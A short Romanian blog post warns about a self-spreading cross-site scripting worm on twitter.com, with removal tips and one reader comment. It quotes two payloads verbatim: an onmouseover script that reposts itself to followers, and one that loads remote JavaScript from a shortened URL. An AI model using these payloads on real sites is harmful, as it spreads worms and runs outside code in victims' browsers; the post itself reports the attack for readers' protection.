Exploit de securitate pe Twitter

Azi, de vreo 15 minute au început să apară pe Twitter tot felul de mesaje care conțin același cod HTML și JavaScript. Ele vin de la utilizatorii care folosesc Twitter direct de pe twitter.com și conțin un script ascuns, care dă tweet-uri mai departe către urmăritorii lor.

Exploit-ul 1:

scriptul: http://a.no/@”onmouseover=”;$(‘textarea:first’).val(this.innerHTML);$(‘.status-update-form’).submit()” style=”color:#000;background:#000;/

Exploit-ul 2:

scriptul: http://t.co/@”style=”font-size:999999999999px;”onmouseover=”$.getScript(‘http:\u002f\u002fis.gd\u002ffl9A7’)”/

Sfaturi pentru eliminare:

1. Nu mai trece cu mouse-ul peste tweet-urile infectate! Da, ălea negre și textele uriașe

2. Folosește un client desktop de Twitter în loc de Twitter.com

Recomand Tweetdeck

Update: cică Twitter ar fi rezolvat problema(cel puțin la nivel de avertizare)

Update 2: Mashable.com a descoperit și alte tipuri de scripturi – un pop-up, de exemplu. Nici TheNextWeb nu se lasă mai prejos – aici, un overlayer gri și niște mesaje de eroare

7 thoughts on “Exploit de securitate pe Twitter”

  1. cat de maniac tre sa fii ca sa te distreze tweeturile goale si negre?

    e la mintea cocosului sa scapam de prostia asta

Leave a Reply

Your email address will not be published. Required fields are marked *